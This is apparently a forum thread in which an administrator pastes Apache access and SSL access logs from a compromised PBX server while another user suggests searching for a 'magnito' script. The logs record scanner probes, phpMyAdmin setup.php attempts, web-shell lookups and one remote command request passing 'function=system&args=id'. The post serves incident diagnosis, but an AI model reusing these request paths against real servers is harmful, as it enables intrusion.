Check your logs(messages, httpd, secure and dmesg), definetively you have an script triggering this, so you need to find that.
Also make a recursive search of the string "magnito" in all your system if the script exist it for sure are creating a file called magnito,
venturinog Here is the /etc/httpd/logs/access.log file of yesterday June 9th, 2017:
146.0.243.29 - - [09/Jun/2017:00:58:20 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
195.154.181.160 - - [09/Jun/2017:01:41:28 -0400] "GET /goautodial-admin/project_auth_entries.txt HTTP/1.1" 302 246 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30"
195.154.181.160 - - [09/Jun/2017:01:41:28 -0400] "GET /agc/ HTTP/1.1" 302 209 "-" "-"
195.154.181.160 - - [09/Jun/2017:01:41:29 -0400] "POST /CGI/Execute HTTP/1.1" 302 216 "-" "-"
139.162.124.167 - - [09/Jun/2017:04:11:28 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0"
91.196.50.33 - - [09/Jun/2017:04:27:49 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 302 225 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
115.79.62.252 - - [09/Jun/2017:07:29:30 -0400] "GET / HTTP/1.1" 302 208 "-" "-"
180.234.24.160 - - [09/Jun/2017:07:51:48 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
180.234.24.160 - - [09/Jun/2017:07:51:50 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
146.0.243.29 - - [09/Jun/2017:08:30:37 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
46.246.37.67 - - [09/Jun/2017:08:59:03 -0400] "GET /muieblackcat HTTP/1.1" 302 217 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:03 -0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:04 -0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:04 -0400] "GET //pma/scripts/setup.php HTTP/1.1" 302 226 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:05 -0400] "GET //myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "-"
46.246.37.67 - - [09/Jun/2017:08:59:05 -0400] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "-"
::1 - - [09/Jun/2017:09:24:10 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
179.158.22.2 - - [09/Jun/2017:10:09:25 -0400] "GET /hndUnblock.cgi HTTP/1.0" 302 219 "-" "Wget(linux)"
179.158.22.2 - - [09/Jun/2017:10:09:26 -0400] "GET /tmUnblock.cgi HTTP/1.0" 302 218 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:13 -0400] "GET /cgi/common.cgi HTTP/1.0" 302 219 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "GET /stssys.htm HTTP/1.0" 302 215 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "GET / HTTP/1.0" 302 205 "-" "Wget(linux)"
187.39.190.172 - - [09/Jun/2017:10:39:14 -0400] "POST /command.php HTTP/1.0" 302 216 "-" "Wget(linux)"
::1 - - [09/Jun/2017:13:08:37 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
37.199.5.125 - - [09/Jun/2017:13:58:29 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
::1 - - [09/Jun/2017:14:15:08 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
51.15.12.13 - - [09/Jun/2017:14:57:22 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 302 237 "-" "-"
87.181.110.35 - - [09/Jun/2017:15:53:33 -0400] "POST / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
217.79.182.120 - - [09/Jun/2017:16:12:36 -0400] "\x03" 400 226 "-" "-"
217.79.182.120 - - [09/Jun/2017:16:12:36 -0400] "\x03" 400 226 "-" "-"
146.0.243.29 - - [09/Jun/2017:17:41:55 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 302 233 "-" "curl/7.29.0"
45.55.11.143 - - [09/Jun/2017:20:17:43 -0400] "OPTIONS / HTTP/1.1" 400 226 "-" "-"
200.116.88.105 - - [09/Jun/2017:21:21:28 -0400] "GET /a2billing/customer/javascript/misc.js HTTP/1.1" 302 242 "-" "curl/7.15.5 (i386-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"
163.172.69.33 - - [09/Jun/2017:22:01:05 -0400] "GET /recordings//theme/main.css HTTP/1.1" 302 231 "-" "curl/7.29.0"
163.172.69.33 - - [09/Jun/2017:22:01:07 -0400] "\x16\x03\x01" 400 226 "-" "-"
23.239.70.162 - - [09/Jun/2017:22:19:20 -0400] "GET / HTTP/1.1" 302 205 "-" "libwww-perl/6.23"
213.202.233.77 - - [09/Jun/2017:22:47:51 -0400] "GET /admin/ajax.php HTTP/1.1" 302 219 "-" "curl/7.29.0"
76.108.242.230 - - [09/Jun/2017:23:15:00 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
::1 - - [09/Jun/2017:23:15:11 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
::1 - - [09/Jun/2017:23:15:12 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
::1 - - [09/Jun/2017:23:15:13 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
::1 - - [09/Jun/2017:23:15:44 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
92.114.32.161 - - [09/Jun/2017:23:39:43 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 302 232 "-" "libwww-perl/6.26"
92.114.32.161 - - [09/Jun/2017:23:53:55 -0400] "GET /recordings/ HTTP/1.1" 302 216 "-" "libwww-perl/6.26"
47.93.186.14 - - [10/Jun/2017:02:00:48 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec
HTTP/1.1" 302 246 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:48 -0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec HTTP/1.1" 302 246 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:49 -0400] "GET /pma/scripts/setup.php HTTP/1.1" 302 226 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 302 233 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /pma/scripts/setup.php HTTP/1.1" 302 226 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:50 -0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:51 -0400] "GET /myadmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
47.93.186.14 - - [10/Jun/2017:02:00:51 -0400] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 302 230 "-" "ZmEu"
::1 - - [10/Jun/2017:02:00:51 -0400] "OPTIONS HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 (internal dummy connection)"
144.217.173.209 - - [10/Jun/2017:04:02:44 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
144.217.173.212 - - [10/Jun/2017:04:08:14 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
198.50.160.105 - - [10/Jun/2017:04:19:03 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:41 -0400] "GET /recordings/index.php HTTP/1.1" 302 225 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:43 -0400] "POST /admin/ajax.php?module=music HTTP/1.1" 302 232 "http://204.13.1.139/admin/config.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:44 -0400] "POST /admin/ajax.php?module=blacklist HTTP/1.1" 302 236 "http://204.13.1.139/admin/config.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:45 -0400] "POST /admin/ajax.php?module=recordings HTTP/1.1" 302 237 "http://204.13.1.139/admin/config.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:46 -0400] "GET /admin/ajax.php HTTP/1.1" 302 219 "/admin/index.php" "-"
51.15.12.13 - - [10/Jun/2017:04:55:47 -0400] "GET /admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id HTTP/1.1" 302 321 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:48 -0400] "GET /admin/modules/backup/page.backup.php HTTP/1.1" 302 241 "-" "-"
51.15.12.13 - - [10/Jun/2017:04:55:50 -0400] "POST /vtigercrm/phprint.php HTTP/1.1" 302 226 "http://204.13.1.139/vtigercrm/phprint.php" "-"
144.217.173.209 - - [10/Jun/2017:05:04:07 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
183.129.160.229 - - [10/Jun/2017:05:06:26 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
144.217.173.212 - - [10/Jun/2017:05:09:51 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
198.50.160.105 - - [10/Jun/2017:05:24:54 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
190.94.141.214 - - [10/Jun/2017:05:42:12 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:13 -0400] "GET / HTTP/1.1" 400 226 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:14 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
190.94.141.214 - - [10/Jun/2017:05:42:14 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
190.94.141.214 - - [10/Jun/2017:05:42:15 -0400] "GET / HTTP/1.1" 302 202 "-" "masscan/1.0"
144.217.173.212 - - [10/Jun/2017:06:16:52 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
144.217.173.209 - - [10/Jun/2017:06:19:25 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
198.50.160.105 - - [10/Jun/2017:06:38:58 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
1.205.110.99 - - [10/Jun/2017:07:21:35 -0400] "GET login.cgi HTTP/1.0" 400 226 "-" "-"
91.196.50.33 - - [10/Jun/2017:07:24:49 -0400] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 302 225 "-" "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0"
191.100.11.163 - - [10/Jun/2017:08:28:36 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:37 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:38 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:39 -0400] "GET / HTTP/1.1" 400 226 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:40 -0400] "GET / HTTP/1.0" 302 193 "-" "masscan/1.0"
191.100.11.163 - - [10/Jun/2017:08:28:41 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
191.100.11.163 - - [10/Jun/2017:08:28:41 -0400] "GET / HTTP/1.1" 302 202 "-" "masscan/1.0"
139.162.119.197 - - [10/Jun/2017:09:01:21 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
144.217.173.212 - - [10/Jun/2017:09:16:10 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
144.217.173.209 - - [10/Jun/2017:09:29:31 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
98.242.248.14 - - [10/Jun/2017:09:45:22 -0400] "GET / HTTP/1.1" 302 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
89.163.255.251 - - [10/Jun/2017:09:48:21 -0400] "HEAD / HTTP/1.0" 302 - "-" "-"
198.50.160.105 - - [10/Jun/2017:09:50:20 -0400] "GET / HTTP/1.0" 302 193 "-" "-"
venturinog And here is the /etc/httpd/logs/ssl_access.log file for yesterday, June 9th, 2017:
13.58.12.77 - admin [09/Jun/2017:16:00:50 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:16:00:50 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:16:00:50 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:01:43 -0400] "POST / HTTP/1.1" 200 5409
51.15.52.242 - - [09/Jun/2017:16:02:08 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
51.15.52.242 - - [09/Jun/2017:16:02:11 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
87.181.110.35 - - [09/Jun/2017:16:03:44 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:05:46 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:07:46 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:09:47 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:11:48 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:13:49 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:15:50 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:17:51 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:19:52 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:21:52 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:23:38 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:23:53 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:25:38 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:25:54 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:27:39 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:27:54 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:29:40 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:29:55 -0400] "POST / HTTP/1.1" 200 5409
188.161.115.236 - - [09/Jun/2017:16:30:50 -0400] "GET /a2billing/ HTTP/1.1" 404 208
99.64.248.239 - - [09/Jun/2017:16:31:40 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:31:56 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:33:41 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:33:57 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:35:42 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:35:58 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:37:42 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:37:58 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:39:43 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:39:59 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:41:43 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:42:00 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:43:43 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:44:01 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:45:44 -0400] "POST / HTTP/1.1" 200 5409
51.15.52.242 - - [09/Jun/2017:16:45:59 -0400] "GET / HTTP/1.0" 400 362
51.15.52.242 - - [09/Jun/2017:16:46:00 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
87.181.110.35 - - [09/Jun/2017:16:46:01 -0400] "POST / HTTP/1.1" 200 5409
51.15.52.242 - - [09/Jun/2017:16:47:37 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
51.15.52.242 - - [09/Jun/2017:16:47:38 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
99.64.248.239 - - [09/Jun/2017:16:47:44 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:48:02 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:49:44 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:50:02 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:51:45 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:52:03 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:53:45 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:54:04 -0400] "POST / HTTP/1.1" 200 5409
13.58.12.77 - admin [09/Jun/2017:16:55:00 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - admin [09/Jun/2017:16:55:00 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:16:55:00 -0400] "POST / HTTP/1.1" 200 5409
13.58.12.77 - - [09/Jun/2017:16:55:00 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
99.64.248.239 - - [09/Jun/2017:16:55:45 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:56:04 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:57:46 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:16:58:05 -0400] "POST / HTTP/1.1" 200 5409
99.64.248.239 - - [09/Jun/2017:16:59:46 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:17:00:05 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:17:02:06 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:17:04:07 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:17:06:07 -0400] "POST / HTTP/1.1" 200 5409
13.58.12.77 - admin [09/Jun/2017:17:06:08 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - admin [09/Jun/2017:17:06:08 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:17:06:08 -0400] "POST / HTTP/1.1" 200 5409
13.58.12.77 - - [09/Jun/2017:17:06:08 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
87.181.110.35 - - [09/Jun/2017:17:08:08 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:17:10:10 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:17:12:12 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:17:14:13 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:17:16:13 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:17:18:14 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:17:20:14 -0400] "POST / HTTP/1.1" 200 5409
87.181.110.35 - - [09/Jun/2017:17:22:15 -0400] "POST / HTTP/1.1" 200 5409
146.0.243.29 - - [09/Jun/2017:17:39:48 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
146.0.243.29 - - [09/Jun/2017:17:43:29 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
146.0.243.29 - - [09/Jun/2017:17:43:29 -0400] "GET /recordings/page.framework.php HTTP/1.1" 403 231
146.0.243.29 - - [09/Jun/2017:17:43:30 -0400] "GET /recordings/ HTTP/1.1" 200 6677
146.0.243.29 - - [09/Jun/2017:17:52:46 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
146.0.243.29 - - [09/Jun/2017:17:54:36 -0400] "GET /vtigercrm/test/upload/vtigercrm.txt HTTP/1.1" 404 233
13.58.12.77 - admin [09/Jun/2017:18:00:23 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - admin [09/Jun/2017:18:00:23 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:18:00:23 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:18:00:23 -0400] "POST / HTTP/1.1" 200 5409
13.58.12.77 - admin [09/Jun/2017:18:11:31 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - admin [09/Jun/2017:18:11:31 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:18:11:31 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:18:11:31 -0400] "POST / HTTP/1.1" 200 5409
13.58.12.77 - admin [09/Jun/2017:19:05:42 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - admin [09/Jun/2017:19:05:42 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:19:05:42 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:19:05:42 -0400] "POST / HTTP/1.1" 200 5409
213.202.233.77 - - [09/Jun/2017:19:11:49 -0400] "GET /jnkp.php HTTP/1.1" 404 206
213.202.233.77 - - [09/Jun/2017:19:11:50 -0400] "GET /assets/jnkp.php HTTP/1.1" 404 213
213.202.233.77 - - [09/Jun/2017:19:11:50 -0400] "GET /asterisk/jnkp.php HTTP/1.1" 404 216
213.202.233.77 - - [09/Jun/2017:19:11:51 -0400] "GET /recordings/jnkp.php HTTP/1.1" 403 221
213.202.233.77 - - [09/Jun/2017:19:11:51 -0400] "GET /jnkp.php HTTP/1.1" 404 206
213.202.233.77 - - [09/Jun/2017:19:11:52 -0400] "GET /assets/jnkp.php HTTP/1.1" 404 213
213.202.233.77 - - [09/Jun/2017:19:11:53 -0400] "GET /asterisk/jnkp.php HTTP/1.1" 404 216
213.202.233.77 - - [09/Jun/2017:19:11:53 -0400] "GET /recordings/jnkp.php HTTP/1.1" 403 221
13.58.12.77 - admin [09/Jun/2017:19:16:45 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - admin [09/Jun/2017:19:16:45 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:19:16:45 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
13.58.12.77 - - [09/Jun/2017:19:16:45 -0400] "POST / HTTP/1.1" 200 5409
163.172.69.33 - - [09/Jun/2017:19:44:46 -0400] "GET / HTTP/1.0" 400 362
163.172.69.33 - - [09/Jun/2017:19:44:49 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
163.172.69.33 - - [09/Jun/2017:19:48:53 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
163.172.69.33 - - [09/Jun/2017:19:48:55 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
163.172.69.33 - - [09/Jun/2017:19:49:43 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
163.172.69.33 - - [09/Jun/2017:19:49:46 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
137.116.71.170 - - [09/Jun/2017:19:58:21 -0400] "GET /robots.txt HTTP/1.1" 200 361
13.58.12.77 - - [09/Jun/2017:20:10:48 -0400] "GET /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:20:10:49 -0400] "POST /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:20:10:49 -0400] "GET /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:20:10:48 -0400] "POST / HTTP/1.1" 200 5409
163.172.64.146 - - [09/Jun/2017:20:12:42 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "GET /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "POST /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "GET /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "POST / HTTP/1.1" 200 5409
13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "POST /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "GET /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "GET /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "POST / HTTP/1.1" 200 5409
200.116.88.105 - - [09/Jun/2017:21:16:50 -0400] "GET /a2billing/customer/javascript/misc.js HTTP/1.1" 404 235
13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "GET /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "POST /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "GET /admin/config.php HTTP/1.1" 404 214
13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "POST / HTTP/1.1" 200 5409
23.239.70.162 - - [09/Jun/2017:22:19:20 -0400] "GET / HTTP/1.1" 200 5409
76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET / HTTP/1.1" 200 5409
76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
